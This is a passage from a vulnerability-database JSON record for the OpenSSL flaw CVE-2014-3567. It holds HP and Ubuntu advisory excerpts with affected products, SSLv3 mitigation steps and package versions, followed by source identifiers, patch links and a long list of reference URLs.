Mobility Cntlr (WW)\nJ9695A HP MSM720 TAA Access Controller\nJ9696A HP MSM720 TAA Premium Mobility Cntlr\n\nM220\n Fixes in progress\nuse mitigations\n J9798A HP M220 802.11n (AM) Access Point\nJ9799A HP M220 802.11n (WW) Access Point\n\nM210\n Fixes in progress\nuse mitigations\n JL023A HP M210 802.11n (AM) Access Point\nJL024A HP M210 802.11n (WW) Access Point\n\nPS110\n Fixes in progress\nuse mitigations\n JL065A HP PS110 Wireless 802.11n VPN AM Router\nJL066A HP PS110 Wireless 802.11n VPN WW Router\n\nHP Office Connect 1810 PK\n Fixes in progress\nuse mitigations\n J9660A HP 1810-48G Switch\n\nHP Office Connect 1810 P\n Fixes in progress\nuse mitigations\n J9450A HP 1810-24G Switch\nJ9449A HP 1810-8G Switch\n\nHP Office Connect 1810 PL\n Fixes in progress\nuse mitigations\n J9802A HP 1810-8G v2 Switch\nJ9803A HP 1810-24G v2 Switch\n\nRF Manager\n Fixes in progress\nuse mitigations\n J9522A HP E-MSM415 RF Security Sensor J9521A HP RF Manager Controller with\n50 Sensor License J9838AAE HP RF Manager for VMware 50 Sensor E-LTU\n\nHP Office Connect 1810 PM\n Fixes in progress\nuse mitigations\n J9800A HP 1810-8 v2 Switch\nJ9801A HP 1810-24 v2 Switch\n\nHP Office Connect PS1810\n Fixes in progress\nuse mitigations\n J9833A HP PS1810-8G Switch\nJ9834A HP PS1810-24G Switch\n\nMitigation Instructions\n\nFor SSLv3 Server Functionality on Impacted Products:\n\nDisable SSLv3 on clients\nand/or disable CBC ciphers on clients\nUse Access Control functionality to control client access\n\nFor SSLv3 Client Functionality on Impacted Products:\n\nGo to SSL server and disable SSLv3\nand/or disable CBC ciphers\nUse Access Control functionality to control access to servers\n\nHISTORY\nVersion:1 (rev.1) - 2 April 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. The HP Matrix\nOperating Environment v7.2.3 Update kit applicable to HP Matrix Operating\nEnvironment 7.2.x installations is available at the following location:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPID\n\nNOTE: Please read the readme.txt file before proceeding with the\ninstallation. \nHP BladeSystem c-Class Onboard Administrator (OA) 4.30 and earlier. \n\nGo to\nhttp://www.hp.com/go/oa\n\nSelect \"Onboard Administrator Firmware\"\nSelect product name as \"\"HP BLc3000 Onboard Administrator Option\" or \"HP\nBLc7000 Onboard Administrator Option\"\nSelect the operating system from the list of choices\nSelect Firmware version 4.40 for download\nRefer to the HP BladeSystem Onboard Administrator User Guide for steps to\nupdate the Onboard Administrator firmware. ============================================================================\nUbuntu Security Notice USN-2385-1\nOctober 16, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. \nThis issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  libssl1.0.0                     1.0.1f-1ubuntu2.7\n\nUbuntu 12.04 LTS:\n  libssl1.0.0                     1.0.1-4ubuntu5.20\n\nUbuntu 10.04 LTS:\n  libssl0.9.8                     0.9.8k-7ubuntu8.22\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      },
      {
        "db": "BID",
        "id": "70586"
      },
      {
        "db": "PACKETSTORM",
        "id": "169664"
      },
      {
        "db": "PACKETSTORM",
        "id": "128793"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "133617"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "128921"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "db": "PACKETSTORM",
        "id": "131044"
      },
      {
        "db": "PACKETSTORM",
        "id": "132085"
      },
      {
        "db": "PACKETSTORM",
        "id": "131014"
      },
      {
        "db": "PACKETSTORM",
        "id": "131273"
      },
      {
        "db": "PACKETSTORM",
        "id": "128838"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "131306"
      },
      {
        "db": "PACKETSTORM",
        "id": "128708"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-3567",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "70586",
        "trust": 1.4
      },
      {
        "db": "SECUNIA",
        "id": "62124",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "62030",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61058",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "59627",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61819",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61130",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61207",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61837",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61990",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61298",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "62070",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61073",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61959",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1031052",
        "trust": 1.1
      },
      {
        "db": "MCAFEE",
        "id": "SB10091",
        "trust": 1.1
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2148",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-3567",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131306",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130815",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128838",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131273",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131014",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132085",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131044",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128708",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128921",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132081",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "133617",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132080",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128728",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128793",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169664",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "db": "BID",
        "id": "70586"
      },
      {
        "db": "PACKETSTORM",
        "id": "131306"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "128838"
      },
      {
        "db": "PACKETSTORM",
        "id": "131273"
      },
      {
        "db": "PACKETSTORM",
        "id": "131014"
      },
      {
        "db": "PACKETSTORM",
        "id": "132085"
      },
      {
        "db": "PACKETSTORM",
        "id": "131044"
      },
      {
        "db": "PACKETSTORM",
        "id": "128708"
      },
      {
        "db": "PACKETSTORM",
        "id": "128921"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "133617"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128793"
      },
      {
        "db": "PACKETSTORM",
        "id": "169664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "id": "VAR-201410-1144",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.3025641
  },
  "last_update_date": "2024-07-23T21:24:46.357000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "openssl-1.0.0o",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52068"
      },
      {
        "title": "openssl-0.9.8zc",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52067"
      },
      {
        "title": "openssl-1.0.1j",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=52069"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2014/10/15/openssl_ddos_vulns/"
      },
      {
        "title": "Red Hat: Critical: rhev-hypervisor6 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150126 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2014-3567",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3567"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2385-1"
      },
      {
        "title": "Debian Security Advisories: DSA-3053-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=89bdef3607a7448566a930eca0e94cb3"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-427",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-427"
      },
      {
        "title": "Symantec Security Advisories: SA87 : OpenSSL Security Advisory 15-Oct-2014",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=374cff59719675d8235f907c21b99bfc"
      },
      {
        "title": "Tenable Security Advisories: [R7] OpenSSL \u002720141015\u0027 Advisory Affects Tenable Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-11"
      },
      {
        "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
      },
      {
        "title": "Splunk Security Announcements: Splunk Enterprise versions 6.0.7 and 5.0.11 address three vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=555e6256ba536e4a20d40e659e367839"
      },
      {
        "title": "Splunk Security Announcements: Splunk Enterprise 6.1.5 addresses two vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=dfed8c47fbdf5e7bb5fbbdd725bdfb67"
      },
      {
        "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e"
      },
      {
        "title": "rhsecapi",
        "trust": 0.1,
        "url": "https://github.com/redhatofficial/rhsecapi "
      },
      {
        "title": "cve-pylib",
        "trust": 0.1,
        "url": "https://github.com/redhatproductsecurity/cve-pylib "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-399",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://www.openssl.org/news/secadv_20141015.txt"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567"
      },
      {
        "trust": 1.4,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997"
      },
      {
        "trust": 1.4,
        "url": "http://www.splunk.com/view/sp-caaanst"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
      },
      {
        "trust": 1.4,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc"
      },
      {
        "trust": 1.4,
        "url": "https://support.citrix.com/article/ctx216642"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html"
      },
      {
        "trust": 1.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/70586"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-1692.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2385-1"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:203"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-1652.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2014/dsa-3053"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61130"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61073"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/62070"
      },
      {
        "trust": 1.1,
        "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1031052"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html"
      },
      {
        "trust": 1.1,
        "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-015.txt.asc"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61207"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/62030"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61819"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61058"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61990"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61837"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/62124"
      },
      {
        "trust": 1.1,
        "url": "http://support.apple.com/ht204244"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2015/jan/msg00003.html"
      },
      {
        "trust": 1.1,
        "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0126.html"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142834685803386\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142804214608580\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888"
      },
      {
        "trust": 1.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10091"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61959"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61298"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/59627"
      },
      {
        "trust": 1.1,
        "url": "http://advisories.mageia.org/mgasa-2014-0416.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143290583027876\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00002.html"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/ht205217"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=7fd4ce6a997be5f5c9e744ac527725c2850de203"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568"
      },
      {
        "trust": 0.8,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.8,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.8,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511"
      },
      {
        "trust": 0.4,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_"
      },
      {
        "trust": 0.4,
        "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21687676"
      },
      {
        "trust": 0.3,
        "url": "http://www.openssl.org"
      },
      {
        "trust": 0.3,
        "url": "https://bto.bluecoat.com/security-advisory/sa87"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690537"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959161"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691210"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/may/158"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/may/156"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/may/157"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574073"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/may/159"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/feb/151"
      },
      {
        "trust": 0.3,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:23.openssl.asc"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04492722"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692"
      },
      {
        "trust": 0.3,
        "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04616259"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/apr/35"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04624296"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04533567 "
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04533567 "
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686792"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098196"
      },
      {
        "trust": 0.3,
        "url": "https://support.asperasoft.com/entries/103000206-security-advisory-cve-2014-3513-cve-2014-3566-poodle-cve-2014-3567-cve-2014-3568"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097074"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21884030"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959134"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21688284"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697995"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697165"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687801"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21689482"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097375"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689101"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098265"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021548"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097587"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701452"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098251"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098105"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21693662"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689347"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097159"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097913"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097867"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097911"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097807"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098586"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689743"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020593"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21691140"
      },
      {
        "trust": 0.3,
        "url": "http://www.vmware.com/security/advisories/vmsa-2015-0001.html "
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101009000"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699200"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700489"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687863"
      },
      {
        "trust": 0.3,
        "url": "www-01.ibm.com/support/docview.wss?uid=ssg1s1005003"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-3567"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.2,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/399.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2015:0126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2385-1/"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=37192"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/go/oa"
      },
      {
        "trust": 0.1,
